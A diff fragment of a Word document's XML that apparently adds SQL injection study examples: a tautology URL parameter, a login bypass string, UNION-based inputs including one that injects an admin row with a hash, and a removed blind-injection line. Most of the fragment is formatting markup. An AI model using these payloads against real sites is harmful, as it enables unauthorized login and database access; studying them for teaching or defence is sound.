+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>page</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="1F2328"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="pl-c1"/>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="0550AE"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>asp</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="1F2328"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>?id</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="pl-k"/>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="CF222E"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>=</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="pl-c1"/>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="0550AE"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>1</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="1F2328"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="pl-k"/>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="CF222E"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>or</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="1F2328"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="pl-c1"/>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="0550AE"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>1</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="pl-k"/>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="CF222E"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>=</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="pl-c1"/>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="0550AE"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>1</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="1F2328"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="pl-c"/>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="59636E"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>-- true</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:ind w:firstLine="0"/>
-      </w:pPr>
-      <w:r>
-        <w:t>/</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="n"/>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="36464E"/>
-        </w:rPr>
-        <w:t>item</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="k"/>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="3F6EC6"/>
-        </w:rPr>
-        <w:t>?</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="n"/>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="36464E"/>
-        </w:rPr>
-        <w:t>id</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="p"/>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-        </w:rPr>
-        <w:t>=</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="n"/>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="36464E"/>
-        </w:rPr>
-        <w:t>1</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="36464E"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="n"/>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="36464E"/>
-        </w:rPr>
-        <w:t>AND</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="36464E"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="n"/>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="36464E"/>
-        </w:rPr>
-        <w:t>LENGTH</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="p"/>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-        </w:rPr>
-        <w:t>(</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="nv"/>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-        </w:rPr>
-        <w:t>@@hostname</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="p"/>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-        </w:rPr>
-        <w:t>)=</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="n"/>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="36464E"/>
-        </w:rPr>
-        <w:t>1</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="36464E"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="p"/>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>LOGIN:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>admin' OR '1'='1' -- -</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>SEARCH:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>a UNION select 123</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTMLPreformatted"/>
+        <w:shd w:val="clear" w:color="auto" w:fill="F6F8FA"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="1F2328"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="1F2328"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>admin</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="pl-pds"/>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="0A3069"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>'</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="pl-s"/>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="0A3069"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> AND 1=0 UNION ALL SELECT </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="pl-pds"/>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="0A3069"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>'</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="1F2328"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>admin</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="pl-pds"/>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="0A3069"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>'</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="pl-s"/>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="0A3069"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="pl-pds"/>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="0A3069"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>'</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="1F2328"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>161ebd7d45089b3446ee4e0d86dbcf92</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="pl-pds"/>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="0A3069"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>'</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="pl-s"/>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="0A3069"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
         </w:rPr>
         <w:t>--</w:t>
       </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
     </w:p>
     <w:sectPr>
       <w:pgSz w:w="11900" w:h="16840"/>
@@ -1769,6 +4381,7 @@
   <w:style w:type="paragraph" w:default="1" w:styleId="Normal">
     <w:name w:val="Normal"/>
     <w:qFormat/>
+    <w:rsid w:val="00AF3A33"/>
     <w:pPr>
       <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
     </w:pPr>
@@ -2001,6 +4614,19 @@
     <w:name w:val="nv"/>
     <w:basedOn w:val="DefaultParagraphFont"/>
     <w:rsid w:val="000408D3"/>
+  </w:style>
+  <w:style w:type="character" w:styleId="HTMLCode">
+    <w:name w:val="HTML Code"/>
+    <w:basedOn w:val="DefaultParagraphFont"/>
+    <w:uiPriority w:val="99"/>
+    <w:semiHidden/>
+    <w:unhideWhenUsed/>
+    <w:rsid w:val="005C795A"/>
+    <w:rPr>
+      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+      <w:sz w:val="20"/>
+      <w:szCs w:val="20"/>
+    </w:rPr>
   </w:style>
 </w:styles>
 </file>
